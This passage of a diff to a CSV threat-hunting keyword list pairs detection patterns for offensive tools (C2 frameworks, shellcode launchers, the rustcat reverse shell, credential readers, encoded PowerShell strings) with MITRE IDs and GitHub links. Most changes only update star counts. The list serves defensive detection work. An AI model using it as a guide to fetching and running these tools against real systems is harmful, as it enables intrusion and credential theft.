TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RunasCreateProcessAsUserW*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" @@ -16044,21 +16225,21 @@ "*RunasCs_net2.exe*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCsMain*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs-master*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*runas-netonly *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*runas-netonly *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*runasppl_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*RunAsWinTcb.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunAsWinTcb-master*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*run-dll SharpSploit*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*rundll32 charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*rundll32.exe agressor.dll*dec*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" "*RunDLL32JSStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Run-EXEonRemote*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*runFakeTerminal*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*Running final exploit packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*running SharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*RunOF.exe -*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunOF.Internals*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" @@ -16073,6 +16254,7 @@ "*RuralBishop.sln*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop-master*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*rustbof.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*rustcat-3.0.0.zip*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*rusthound * --zip --ldaps --adcs --old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rusthound *--domain*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*rusthound *--ldapfqdn *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" @@ -16082,8 +16264,8 @@ "*RustHound-main*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*rvazarkar/GMSAPasswordReader*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*Rvn0xsy/Cooolis-ms*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*rwxfinder.*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 